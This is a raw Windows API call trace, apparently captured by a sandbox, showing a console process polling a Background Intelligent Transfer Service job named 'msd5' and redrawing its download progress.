[0061.662] IUnknown:QueryInterface (in: This=0x2f0e78, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x14f3c0 | out: ppvObject=0x14f3c0*=0x0) returned 0x80004002
[0061.662] IUnknown:QueryInterface (in: This=0x2f0e78, riid=0x76a597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x14f3a8 | out: ppvObject=0x14f3a8*=0x0) returned 0x80004002
[0061.662] IUnknown:QueryInterface (in: This=0x2f0e78, riid=0x76a69b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x14f35c | out: ppvObject=0x14f35c*=0x2f0e78) returned 0x0
[0061.662] IUnknown:AddRef (This=0x2f0e78) returned 0x3
[0061.662] IUnknown:QueryInterface (in: This=0x2f0e78, riid=0x76a4c15c*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x14f2bc | out: ppvObject=0x14f2bc*=0x0) returned 0x80004002
[0061.662] IUnknown:QueryInterface (in: This=0x2f0e78, riid=0x76a4c0a8*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2f0f8c | out: ppvObject=0x2f0f8c*=0x0) returned 0x80004002
[0061.662] IUnknown:QueryInterface (in: This=0x2f0e78, riid=0x76a4c16c*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0x14f2c4 | out: ppvObject=0x14f2c4*=0x0) returned 0x80004002
[0061.662] IUnknown:Release (This=0x2f0e78) returned 0x2
[0061.665] IUnknown:QueryInterface (in: This=0x2f0e78, riid=0x2e1950*(Data1=0x659cdeac, Data2=0x489e, Data3=0x11d9, Data4=([0]=0xa9, [1]=0xcd, [2]=0x0, [3]=0xd, [4]=0x56, [5]=0x96, [6]=0x52, [7]=0x51)), ppvObject=0x14e7cc | out: ppvObject=0x14e7cc*=0x0) returned 0x80004002
[0061.665] IUnknown:QueryInterface (in: This=0x2f0e78, riid=0x2e1950*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x14e7cc | out: ppvObject=0x14e7cc*=0x2f0e78) returned 0x0
[0061.666] IUnknown:QueryInterface (in: This=0x2f0e78, riid=0x2e1950*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x2e8300 | out: ppvObject=0x2e8300*=0x2f0e78) returned 0x0
[0061.668] IBackgroundCopyJob:Resume (This=0x2da614) returned 0x0
[0061.695] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0061.696] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0061.696] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x14f8e0 | out: lpMode=0x14f8e0) returned 1
[0061.700] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b1) returned 1
[0061.704] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x14f920*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0061.705] PeekMessageW (in: lpMsg=0x14f8f8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14f8f8) returned 1
[0061.705] TranslateMessage (lpMsg=0x14f8f8) returned 0
[0061.705] DispatchMessageW (lpMsg=0x14f8f8) returned 0x1
[0061.706] IUnknown:QueryInterface (in: This=0x2f0e78, riid=0x76a4c17c*(Data1=0x1c733a30, Data2=0x2a1c, Data3=0x11ce, Data4=([0]=0xad, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0x77, [7]=0x3d)), ppvObject=0x14f454 | out: ppvObject=0x14f454*=0x0) returned 0x80004002
[0061.706] IBackgroundCopyCallback:JobModification (This=0x2f0e78, pJob=0x2da6a4, dwReserved=0x0) returned 0x0
[0061.706] IBackgroundCopyJob:GetState (in: This=0x2da614, pVal=0x2f0e84 | out: pVal=0x2f0e84) returned 0x0
[0061.718] IBackgroundCopyJob:GetType (in: This=0x2da614, pVal=0x14efc0 | out: pVal=0x14efc0) returned 0x0
[0061.771] IBackgroundCopyJob:GetProgress (in: This=0x2da614, pVal=0x2f0e88 | out: pVal=0x2f0e88) returned 0x0
[0061.805] IBackgroundCopyJob:GetPriority (in: This=0x2da614, pVal=0x14efbc | out: pVal=0x14efbc) returned 0x0
[0061.806] CoTaskMemFree (pv=0x0)
[0061.807] IBackgroundCopyJob:GetDisplayName (in: This=0x2da614, pVal=0x14efd4 | out: pVal=0x14efd4*="msd5") returned 0x0
[0061.809] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef7c | out: lpConsoleScreenBufferInfo=0x14ef7c) returned 1
[0061.810] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x14ef94 | out: lpNumberOfCharsWritten=0x14ef94) returned 1
[0061.812] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x14ef94 | out: lpNumberOfAttrsWritten=0x14ef94) returned 1
[0061.814] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0061.820] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0061.826] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef68 | out: lpConsoleScreenBufferInfo=0x14ef68) returned 1
[0061.826] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x14ef80, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef80*=0xa) returned 1
[0061.826] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0061.826] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef64 | out: lpConsoleScreenBufferInfo=0x14ef64) returned 1
[0061.826] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x14ef7c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef7c*=0x5) returned 1
[0061.826] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0061.827] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef6c | out: lpConsoleScreenBufferInfo=0x14ef6c) returned 1
[0061.827] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x14ef84, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef84*=0x7) returned 1
[0061.827] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0061.827] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef60 | out: lpConsoleScreenBufferInfo=0x14ef60) returned 1
[0061.827] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef78*=0x8) returned 1
[0061.827] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0061.828] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef68 | out: lpConsoleScreenBufferInfo=0x14ef68) returned 1
[0061.828] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef80, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef80*=0x8) returned 1
[0061.828] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0061.828] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef5c | out: lpConsoleScreenBufferInfo=0x14ef5c) returned 1
[0061.828] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x14ef74, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef74*=0xc) returned 1
[0061.829] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0061.829] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef6c | out: lpConsoleScreenBufferInfo=0x14ef6c) returned 1
[0061.829] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x14ef84, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef84*=0xa) returned 1
[0061.829] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0061.829] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef54 | out: lpConsoleScreenBufferInfo=0x14ef54) returned 1
[0061.829] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x14ef6c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef6c*=0xa) returned 1
[0061.830] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0061.830] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef5c | out: lpConsoleScreenBufferInfo=0x14ef5c) returned 1
[0061.830] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef74, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef74*=0x8) returned 1
[0061.830] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0061.830] _vsnwprintf (in: _Buffer=0xd303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x14ef80 | out: _Buffer="0") returned 1
[0061.831] _vsnwprintf (in: _Buffer=0xd303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x14ef8c | out: _Buffer="1") returned 1
[0061.831] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef5c | out: lpConsoleScreenBufferInfo=0x14ef5c) returned 1
[0061.831] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x14ef74, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef74*=0x5) returned 1
[0061.831] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0061.831] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef64 | out: lpConsoleScreenBufferInfo=0x14ef64) returned 1
[0061.831] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef7c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef7c*=0x8) returned 1
[0061.832] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0061.832] _vsnwprintf (in: _Buffer=0xd303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x14ef88 | out: _Buffer="0") returned 1
[0061.832] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14ef7c | out: lpSystemTimeAsFileTime=0x14ef7c*(dwLowDateTime=0xd5867450, dwHighDateTime=0x1d469c7))
[0061.832] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14ef74 | out: lpSystemTimeAsFileTime=0x14ef74*(dwLowDateTime=0xd5867450, dwHighDateTime=0x1d469c7))
[0061.832] _finite (_X=0x0) returned 0
[0061.832] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef34 | out: lpConsoleScreenBufferInfo=0x14ef34) returned 1
[0061.832] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x14ef4c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef4c*=0xd) returned 1
[0061.832] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0061.833] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef40 | out: lpConsoleScreenBufferInfo=0x14ef40) returned 1
[0061.833] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x14ef58, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef58*=0xf) returned 1
[0061.833] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0061.833] _vsnwprintf (in: _Buffer=0x14ed6c, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x14ed30 | out: _Buffer="0.00 B/S") returned 8
[0061.833] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef84 | out: lpConsoleScreenBufferInfo=0x14ef84) returned 1
[0061.833] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef9c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef9c*=0x8) returned 1
[0061.834] CoTaskMemFree (pv=0x2e8370)
[0061.838] PeekMessageW (in: lpMsg=0x14f8f8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14f8f8) returned 0
[0061.838] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x14f920*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0062.233] PeekMessageW (in: lpMsg=0x14f8f8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14f8f8) returned 1
[0062.233] TranslateMessage (lpMsg=0x14f8f8) returned 0
[0062.233] DispatchMessageW (lpMsg=0x14f8f8) returned 0x1
[0062.234] IBackgroundCopyCallback:JobModification (This=0x2f0e78, pJob=0x2da6a4, dwReserved=0x0) returned 0x0
[0062.234] IBackgroundCopyJob:GetState (in: This=0x2da614, pVal=0x2f0e84 | out: pVal=0x2f0e84) returned 0x0
[0062.257] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fc9
[0062.257] IBackgroundCopyJob:GetType (in: This=0x2da614, pVal=0x14efc0 | out: pVal=0x14efc0) returned 0x0
[0062.258] IBackgroundCopyCallback:JobModification (This=0x2f0e78, pJob=0x2da6a4, dwReserved=0x0) returned 0x0
[0062.258] IBackgroundCopyJob:GetState (in: This=0x2da614, pVal=0x2f0e84 | out: pVal=0x2f0e84) returned 0x0
[0062.259] IBackgroundCopyJob:GetProgress (in: This=0x2da614, pVal=0x2f0e88 | out: pVal=0x2f0e88) returned 0x0
[0062.260] IBackgroundCopyJob:GetPriority (in: This=0x2da614, pVal=0x14efbc | out: pVal=0x14efbc) returned 0x0
[0062.261] CoTaskMemFree (pv=0x0)
[0062.261] IBackgroundCopyJob:GetDisplayName (in: This=0x2da614, pVal=0x14efd4 | out: pVal=0x14efd4*="msd5") returned 0x0
[0062.262] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef7c | out: lpConsoleScreenBufferInfo=0x14ef7c) returned 1
[0062.262] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x14ef94 | out: lpNumberOfCharsWritten=0x14ef94) returned 1
[0062.263] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x14ef94 | out: lpNumberOfAttrsWritten=0x14ef94) returned 1
[0062.263] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0062.263] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0062.263] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef68 | out: lpConsoleScreenBufferInfo=0x14ef68) returned 1
[0062.264] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x14ef80, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef80*=0xa) returned 1
[0062.264] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0062.264] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef64 | out: lpConsoleScreenBufferInfo=0x14ef64) returned 1
[0062.264] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x14ef7c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef7c*=0x5) returned 1
[0062.265] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0062.265] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef6c | out: lpConsoleScreenBufferInfo=0x14ef6c) returned 1
[0062.265] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x14ef84, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef84*=0x7) returned 1
[0062.265] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0062.265] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef60 | out: lpConsoleScreenBufferInfo=0x14ef60) returned 1
[0062.266] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef78*=0x8) returned 1
[0062.266] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0062.266] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef68 | out: lpConsoleScreenBufferInfo=0x14ef68) returned 1
[0062.266] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef80, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef80*=0x8) returned 1
[0062.267] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0062.267] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef5c | out: lpConsoleScreenBufferInfo=0x14ef5c) returned 1
[0062.267] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x14ef74, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef74*=0xc) returned 1
[0062.267] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0062.267] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef6c | out: lpConsoleScreenBufferInfo=0x14ef6c) returned 1
[0062.268] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x14ef84, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef84*=0xa) returned 1
[0062.268] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0062.268] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef54 | out: lpConsoleScreenBufferInfo=0x14ef54) returned 1
[0062.268] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x14ef6c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef6c*=0xa) returned 1
[0062.274] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0062.276] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef5c | out: lpConsoleScreenBufferInfo=0x14ef5c) returned 1
[0062.277] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef74, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef74*=0x8) returned 1
[0062.277] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0062.277] _vsnwprintf (in: _Buffer=0xd303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x14ef80 | out: _Buffer="0") returned 1
[0062.277] _vsnwprintf (in: _Buffer=0xd303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x14ef8c | out: _Buffer="1") returned 1
[0062.277] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef5c | out: lpConsoleScreenBufferInfo=0x14ef5c) returned 1
[0062.277] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x14ef74, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef74*=0x5) returned 1
[0062.278] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0062.278] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef64 | out: lpConsoleScreenBufferInfo=0x14ef64) returned 1
[0062.278] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef7c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef7c*=0x8) returned 1
[0062.278] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0062.278] _vsnwprintf (in: _Buffer=0xd303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x14ef88 | out: _Buffer="0") returned 1
[0062.278] _vsnwprintf (in: _Buffer=0xd303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x14ef8c | out: _Buffer="112848") returned 6
[0062.279] _vsnwprintf (in: _Buffer=0xd303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x14ef88 | out: _Buffer="0") returned 1
[0062.279] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14ef74 | out: lpSystemTimeAsFileTime=0x14ef74*(dwLowDateTime=0xd5c91ad0, dwHighDateTime=0x1d469c7))
[0062.279] _finite (_X=0x0) returned 1
[0062.279] _finite (_X=0x0) returned 1
[0062.279] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef34 | out: lpConsoleScreenBufferInfo=0x14ef34) returned 1
[0062.279] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x14ef4c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef4c*=0x11) returned 1
[0062.279] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0062.279] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef40 | out: lpConsoleScreenBufferInfo=0x14ef40) returned 1
[0062.280] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x14ef58, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef58*=0xf) returned 1
[0062.280] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0062.280] _vsnwprintf (in: _Buffer=0x14ed6c, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x14ed30 | out: _Buffer="0.00 B/S") returned 8
[0062.280] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef84 | out: lpConsoleScreenBufferInfo=0x14ef84) returned 1
[0062.280] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef9c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef9c*=0x8) returned 1
[0062.281] CoTaskMemFree (pv=0x2e83c0)
[0062.281] PeekMessageW (in: lpMsg=0x14f8f8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14f8f8) returned 0
[0062.281] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x14f920*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0062.775] PeekMessageW (in: lpMsg=0x14f8f8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14f8f8) returned 1
[0062.775] TranslateMessage (lpMsg=0x14f8f8) returned 0
[0062.775] DispatchMessageW (lpMsg=0x14f8f8) returned 0x1
[0062.775] IBackgroundCopyCallback:JobModification (This=0x2f0e78, pJob=0x2da6a4, dwReserved=0x0) returned 0x0
[0062.775] IBackgroundCopyJob:GetState (in: This=0x2da614, pVal=0x2f0e84 | out: pVal=0x2f0e84) returned 0x0
[0062.776] KillTimer (hWnd=0x0, uIDEvent=0x7fc9) returned 1
[0062.776] IBackgroundCopyJob:GetType (in: This=0x2da614, pVal=0x14efc0 | out: pVal=0x14efc0) returned 0x0
[0062.776] IBackgroundCopyJob:GetProgress (in: This=0x2da614, pVal=0x2f0e88 | out: pVal=0x2f0e88) returned 0x0
[0062.777] IBackgroundCopyJob:GetPriority (in: This=0x2da614, pVal=0x14efbc | out: pVal=0x14efbc) returned 0x0
[0062.778] CoTaskMemFree (pv=0x0)
[0062.778] IBackgroundCopyJob:GetDisplayName (in: This=0x2da614, pVal=0x14efd4 | out: pVal=0x14efd4*="msd5") returned 0x0
[0062.778] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef7c | out: lpConsoleScreenBufferInfo=0x14ef7c) returned 1
[0062.779] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x14ef94 | out: lpNumberOfCharsWritten=0x14ef94) returned 1
[0062.779] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x14ef94 | out: lpNumberOfAttrsWritten=0x14ef94) returned 1
[0062.779] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
